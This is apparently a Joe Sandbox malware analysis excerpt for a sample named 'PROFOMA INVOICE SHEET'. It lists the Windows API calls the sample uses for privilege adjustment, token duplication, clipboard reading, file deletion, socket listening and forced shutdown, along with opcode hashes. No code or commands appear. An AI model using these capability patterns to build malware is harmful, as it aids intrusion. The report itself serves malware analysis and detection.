                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0035F557
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: 070065ad943dc3b25039968d2be3d94687a8b36de25ee0aef52d7b56e7d77eb4
                                    • Instruction ID: a458985fa159b406baf1161bb7f50cd9358e2429c29c4f2141ca545afed06f73
                                    • Opcode Fuzzy Hash: 070065ad943dc3b25039968d2be3d94687a8b36de25ee0aef52d7b56e7d77eb4
                                    • Instruction Fuzzy Hash: 6431A771A50318BFEB226BB65C4AFBF7E6CEB45B50F111426FA00E71D1D7B15D00AAA0
                                    APIs
                                      • Part of subcall function 003616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036170D
                                      • Part of subcall function 003616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0036173A
                                      • Part of subcall function 003616C3: GetLastError.KERNEL32 ref: 0036174A
                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00361286
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003612A8
                                    • CloseHandle.KERNEL32(?), ref: 003612B9
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003612D1
                                    • GetProcessWindowStation.USER32 ref: 003612EA
                                    • SetProcessWindowStation.USER32(00000000), ref: 003612F4
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00361310
                                      • Part of subcall function 003610BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003611FC), ref: 003610D4
                                      • Part of subcall function 003610BF: CloseHandle.KERNEL32(?,?,003611FC), ref: 003610E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                    • String ID: $default$winsta0$Z<
                                    • API String ID: 22674027-3701828379
                                    • Opcode ID: 140c4ee1be6791569d248f97af2bed809ba8dca1cddd2e526387bd59f83a95ba
                                    • Instruction ID: 4e0a83b68863ca5839cb7c2ca4dc5b33af83a729b40062236898193f361cf30d
                                    • Opcode Fuzzy Hash: 140c4ee1be6791569d248f97af2bed809ba8dca1cddd2e526387bd59f83a95ba
                                    • Instruction Fuzzy Hash: D081AD71900209AFDF239FA5DC49FEE7BBDEF04704F18812AF910A62A4DB718944CB21
                                    APIs
                                      • Part of subcall function 003610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00361114
                                      • Part of subcall function 003610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361120
                                      • Part of subcall function 003610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 0036112F
                                      • Part of subcall function 003610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361136
                                      • Part of subcall function 003610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0036114D
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00360BCC
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00360C00
                                    • GetLengthSid.ADVAPI32(?), ref: 00360C17
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00360C51
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00360C6D
                                    • GetLengthSid.ADVAPI32(?), ref: 00360C84
                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00360C8C
                                    • HeapAlloc.KERNEL32(00000000), ref: 00360C93
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00360CB4
                                    • CopySid.ADVAPI32(00000000), ref: 00360CBB
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00360CEA
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00360D0C
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00360D1E
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360D45
                                    • HeapFree.KERNEL32(00000000), ref: 00360D4C
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360D55
                                    • HeapFree.KERNEL32(00000000), ref: 00360D5C
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360D65
                                    • HeapFree.KERNEL32(00000000), ref: 00360D6C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00360D78
                                    • HeapFree.KERNEL32(00000000), ref: 00360D7F
                                      • Part of subcall function 00361193: GetProcessHeap.KERNEL32(00000008,00360BB1,?,00000000,?,00360BB1,?), ref: 003611A1
                                      • Part of subcall function 00361193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00360BB1,?), ref: 003611A8
                                      • Part of subcall function 00361193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00360BB1,?), ref: 003611B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                    • String ID:
                                    • API String ID: 4175595110-0
                                    • Opcode ID: 893bc45de6c1a33874ac3393caeb40bfbef4ca6d290075985867ea59c8937fb8
                                    • Instruction ID: 7ffa20970d75c379b84f240480246657fcf8dc028e66e0bfe6410466274b6277
                                    • Opcode Fuzzy Hash: 893bc45de6c1a33874ac3393caeb40bfbef4ca6d290075985867ea59c8937fb8
                                    • Instruction Fuzzy Hash: 40715A7290020AAFDF16DFA4DC45BAFBBBCBF05300F058616E915A6295D772EA05CB60
                                    APIs
                                    • OpenClipboard.USER32(0039CC08), ref: 0037EB29
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0037EB37
                                    • GetClipboardData.USER32(0000000D), ref: 0037EB43
                                    • CloseClipboard.USER32 ref: 0037EB4F
                                    • GlobalLock.KERNEL32(00000000), ref: 0037EB87
                                    • CloseClipboard.USER32 ref: 0037EB91
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0037EBBC
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0037EBC9
                                    • GetClipboardData.USER32(00000001), ref: 0037EBD1
                                    • GlobalLock.KERNEL32(00000000), ref: 0037EBE2
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0037EC22
                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 0037EC38
                                    • GetClipboardData.USER32(0000000F), ref: 0037EC44
                                    • GlobalLock.KERNEL32(00000000), ref: 0037EC55
                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0037EC77
                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0037EC94
                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0037ECD2
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0037ECF3
                                    • CountClipboardFormats.USER32 ref: 0037ED14
                                    • CloseClipboard.USER32 ref: 0037ED59
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                    • String ID:
                                    • API String ID: 420908878-0
                                    • Opcode ID: 466db91c12a13a8f35c1ee3fb045a0a668695d76019e213fa4cd53cff87dd66e
                                    • Instruction ID: cad70e72f3a88232263c59b1b28e602153883f9b1e638e1ba48785c7c76501b2
                                    • Opcode Fuzzy Hash: 466db91c12a13a8f35c1ee3fb045a0a668695d76019e213fa4cd53cff87dd66e
                                    • Instruction Fuzzy Hash: 4A61E6352043019FD322DF24D895F2A7BE8AF88704F05959EF45A9B2E2DB35DD05CB62
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 003769BE
                                    • FindClose.KERNEL32(00000000), ref: 00376A12
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00376A4E
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00376A75
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00376AB2
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00376ADF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                    • API String ID: 3830820486-3289030164
                                    • Opcode ID: 1e4e3f96e95f5adb6aca2e76d5de281738c86d4d530217fdc231aa82264f64f7
                                    • Instruction ID: d4c813db81269adb5ebadc462deafdcf8ce7eb110eec2cbbf46a636d3dc95177
                                    • Opcode Fuzzy Hash: 1e4e3f96e95f5adb6aca2e76d5de281738c86d4d530217fdc231aa82264f64f7
                                    • Instruction Fuzzy Hash: ABD185B1509340AFC715EB64C8A2EAFB7ECAF88704F44491EF589DB191EB34DA44C762
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00379663
                                    • GetFileAttributesW.KERNEL32(?), ref: 003796A1
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 003796BB
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 003796D3
                                    • FindClose.KERNEL32(00000000), ref: 003796DE
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 003796FA
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0037974A
                                    • SetCurrentDirectoryW.KERNEL32(003C6B7C), ref: 00379768
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00379772
                                    • FindClose.KERNEL32(00000000), ref: 0037977F
                                    • FindClose.KERNEL32(00000000), ref: 0037978F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1409584000-438819550
                                    • Opcode ID: 837a362139f7eaade6228959cc4a588117573fe597404f5fcb47b22d6d3ddc06
                                    • Instruction ID: e32890ec7def991f0ef137f53d860630b19aff9d60cb85b7e6adbd6143f07948
                                    • Opcode Fuzzy Hash: 837a362139f7eaade6228959cc4a588117573fe597404f5fcb47b22d6d3ddc06
                                    • Instruction Fuzzy Hash: E231C3325412596BDF26EFB4EC49FDE77AC9F09320F118657F809E2190DB39DE408A20
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003797BE
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00379819
                                    • FindClose.KERNEL32(00000000), ref: 00379824
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00379840
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00379890
                                    • SetCurrentDirectoryW.KERNEL32(003C6B7C), ref: 003798AE
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003798B8
                                    • FindClose.KERNEL32(00000000), ref: 003798C5
                                    • FindClose.KERNEL32(00000000), ref: 003798D5
                                      • Part of subcall function 0036DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0036DB00
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 2640511053-438819550
                                    • Opcode ID: 6d1b1357091d2a62ba9e3a3433bb8d2cf29bfdc6779405badafe5b5d50b02a17
                                    • Instruction ID: 5a83f1e84e5a2ac3e7529bad14359e6ed08eb79fbcf22c12dfbb1ec702e2030a
                                    • Opcode Fuzzy Hash: 6d1b1357091d2a62ba9e3a3433bb8d2cf29bfdc6779405badafe5b5d50b02a17
                                    • Instruction Fuzzy Hash: 4131D0325002197ADF22EFB4EC49BDE77AC9F06320F158697E858E2190DB39DE448B21
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 00378257
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00378267
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00378273
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00378310
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00378324
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00378356
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0037838C
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00378395
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local$System
                                    • String ID: *.*
                                    • API String ID: 1464919966-438819550
                                    • Opcode ID: df639c865c0a21bbfff5480bca1ede2d14fcb6fe07b85b7228cf49e2ffa20755
                                    • Instruction ID: 713b13fb873947bc6892f69f232d872eb8f6e9e36be984756c20d63c058b2e98
                                    • Opcode Fuzzy Hash: df639c865c0a21bbfff5480bca1ede2d14fcb6fe07b85b7228cf49e2ffa20755
                                    • Instruction Fuzzy Hash: B5618C765043059FDB21EF64C8449AEB3E8FF89314F04891EF989CB251DB35E945CB92
                                    APIs
                                      • Part of subcall function 00303AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00303A97,?,?,00302E7F,?,?,?,00000000), ref: 00303AC2
                                      • Part of subcall function 0036E199: GetFileAttributesW.KERNEL32(?,0036CF95), ref: 0036E19A
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0036D122
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0036D1DD
                                    • MoveFileW.KERNEL32(?,?), ref: 0036D1F0
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0036D20D
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0036D237
                                      • Part of subcall function 0036D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0036D21C,?,?), ref: 0036D2B2
                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 0036D253
                                    • FindClose.KERNEL32(00000000), ref: 0036D264
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 1946585618-1173974218
                                    • Opcode ID: 5974e30d4367481f74c4944a2237d0011b313de53eb6ddf0166df2ade9408888
                                    • Instruction ID: 4baa7c317985fb13d086d87437f7717325d04755a3ce2f7f5e7f4c6e484f4acb
                                    • Opcode Fuzzy Hash: 5974e30d4367481f74c4944a2237d0011b313de53eb6ddf0166df2ade9408888
                                    • Instruction Fuzzy Hash: 5C615F31D0214D9FCF06EBE0D9A29EEB779AF55300F208565E4027B196EB319F09CB60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: fbc6e95fbdfba412596fc022c1824ac826a5f8a41e0c9321357f3f19912a2368
                                    • Instruction ID: eb4c461b5c35eb7e3572ce7cc61438c59ff34936b6eaa629ad313f94f3b9aa19
                                    • Opcode Fuzzy Hash: fbc6e95fbdfba412596fc022c1824ac826a5f8a41e0c9321357f3f19912a2368
                                    • Instruction Fuzzy Hash: 1341D435204611AFD722CF15E898F15BBE9FF48318F15C49AE4198FAA2C736EC41CB90
                                    APIs
                                      • Part of subcall function 003616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036170D
                                      • Part of subcall function 003616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0036173A
                                      • Part of subcall function 003616C3: GetLastError.KERNEL32 ref: 0036174A
                                    • ExitWindowsEx.USER32(?,00000000), ref: 0036E932
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $ $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-3163812486
                                    • Opcode ID: d4d498b77fedadc7867126b8aa5ea08d82aa0a05e24989d6c206ca4f8d0709e7
                                    • Instruction ID: e1839223c8f49501fe273d9c2ee67631529a67b9c015de996a5d487c7d3acf1b
                                    • Opcode Fuzzy Hash: d4d498b77fedadc7867126b8aa5ea08d82aa0a05e24989d6c206ca4f8d0709e7
                                    • Instruction Fuzzy Hash: BF014E36620210AFFB5622749C86FBF73EC9F04740F158422FC13E21D5D7655C5481A0
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00381276
                                    • WSAGetLastError.WSOCK32 ref: 00381283
                                    • bind.WSOCK32(00000000,?,00000010), ref: 003812BA
                                    • WSAGetLastError.WSOCK32 ref: 003812C5
                                    • closesocket.WSOCK32(00000000), ref: 003812F4
                                    • listen.WSOCK32(00000000,00000005), ref: 00381303
                                    • WSAGetLastError.WSOCK32 ref: 0038130D
                                    • closesocket.WSOCK32(00000000), ref: 0038133C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                    • String ID:
                                    • API String ID: 540024437-0
                                    • Opcode ID: be237985e5b59a8989c4c502e6e7859281a8d5443a1989d937add56c7b1f70a8
                                    • Instruction ID: 86634bee954c9369a2407b7ec64706f1377ae420acfff4e9c30edd4a8ac38ccd
                                    • Opcode Fuzzy Hash: be237985e5b59a8989c4c502e6e7859281a8d5443a1989d937add56c7b1f70a8
                                    • Instruction Fuzzy Hash: B341A4356002009FD711EF64C494B6ABBE9BF46318F1985C9D8568F2D6C771ED82CBE1
                                    APIs
                                      • Part of subcall function 00303AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00303A97,?,?,00302E7F,?,?,?,00000000), ref: 00303AC2
                                      • Part of subcall function 0036E199: GetFileAttributesW.KERNEL32(?,0036CF95), ref: 0036E19A
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0036D420
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0036D470
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0036D481
                                    • FindClose.KERNEL32(00000000), ref: 0036D498
                                    • FindClose.KERNEL32(00000000), ref: 0036D4A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 2649000838-1173974218
                                    • Opcode ID: 65c9b1f9ed9d8d6e74878fcfd92eac6099961e23a1e4641cc37389bd768f57d6
                                    • Instruction ID: 82bd163fab2e3cf2c9a6fedd6d6ef0d39e4a7a743e016583e8cc59ee303f83af
                                    • Opcode Fuzzy Hash: 65c9b1f9ed9d8d6e74878fcfd92eac6099961e23a1e4641cc37389bd768f57d6
                                    • Instruction Fuzzy Hash: B1316B315193459BC207EF65D8A29AFB7ACAE91300F448E1EF4D197191EF31AE098B62
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
